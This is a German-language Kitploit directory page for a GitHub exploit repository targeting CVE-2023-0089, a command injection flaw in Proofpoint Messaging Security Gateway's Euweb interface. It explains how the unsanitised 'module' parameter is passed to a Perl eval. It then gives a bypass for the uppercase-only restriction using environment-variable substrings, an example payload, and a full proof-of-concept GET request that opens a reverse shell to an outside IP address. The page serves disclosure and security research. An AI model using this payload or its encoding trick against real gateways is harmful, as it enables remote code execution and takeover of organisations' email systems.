Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
proofpoint-CVE-2023-0089 — Proofpoint Email Gateway: Niedrig privilegierter authentifizierter Benutzer zu Admin-RCE | Kitploit
Tools/GitHubGitHub/ly1g3/proofpoint-cve-2023-0089
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubly1g3/proofpoint-cve-2023-0089

proofpoint-CVE-2023-0089

Proofpoint Email Gateway: Niedrig privilegierter authentifizierter Benutzer zu Admin-RCE

Repository anzeigen
11vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Über

Sicherheitsforscher: ly1g3, ly1g3[at]tuta.io

GPG-Fingerabdruck: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Überblick: Remote Code Execution – Von einem niedrig privilegierten authentifizierten Benutzer zu Admin-RCE

CVE: CVE-2023-0089

Zeitleiste:

  • Entdeckt – ly1g3
  • Gemeldet – ly1g3
  • Behoben – Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Exploits für Proofpoint Messaging Security Gateway

Remote Code Execution (RCE)

Ein niedrig privilegierter (authentifizierter) Benutzer des Euweb kann mit Admin-Rechten beliebigen Code ausführen.

Technische Details

Die Funktion getMsgType in Euwebutils.pm ist anfällig für Command Injection. Die Variable $module stammt aus einem GET-Parameter, und auf diese Benutzereingabe wird keine Sanitisierung angewendet.

root@kitploit:~
sub getMsgType {
...
else {
		$msgtype = eval "Proofpoint::Digest::PROOFPOINT_MAIL_REPORT_MSGTYPE_".uc($module);
	}

Diese Funktion getMsgType wird von vielen API-Aufrufen der Euweb-Anwendung verwendet, sodass der Exploit auf viele Arten ausgelöst werden kann.

Da alle Zeichen Großbuchstaben sein müssen, können Umgebungsvariablen verwendet werden, um diese Einschränkung für Kleinbuchstaben zu umgehen. Beispiel: ${SHELL:1:1} anstelle von b

Da use strict verwendet wird, kann MAIL_GENERAL() am Anfang der Zeichenkette hinzugefügt werden, um PROOFPOINT_MAIL_REPORT_MSGTYPE_ zu vervollständigen. Danach kann eigener Perl-Code hinzugefügt werden.

Beispiel-Payload (unkodiert): MAIL_GENERAL();`id`

POC

Reverse-Shell, mithilfe von Umgebungsvariablen kodiert, um die Einschränkung für Kleinbuchstaben zu umgehen. Der Code wird als Benutzer pps ausgeführt.

root@kitploit:~
GET /euweb/euweb?cmd=x_releasemsg&id=0&func=ReleaseMsg&entries=23%3A23%3A12&eid=3&module=MAIL_GENERAL()%3b`/\${SHELL%3a1%3a1}\${SHELL%3a2%3a1}\${LANG%3a1%3a1}/\${USER%3a2%3a1}\${SHELL%3a8%3a1}+-\${SHELL%3a2%3a1}+>%26+/\${SSH_TTY%3a1%3a1}\${TERM%3a2%3a1}\${MAIL%3a1%3a1}/\${TERM%3a1%3a1}\${TERM%3a9%3a1}\${USER%3a0%3a1}/192.168.80.81/443+0>%261`
Tool herunterladen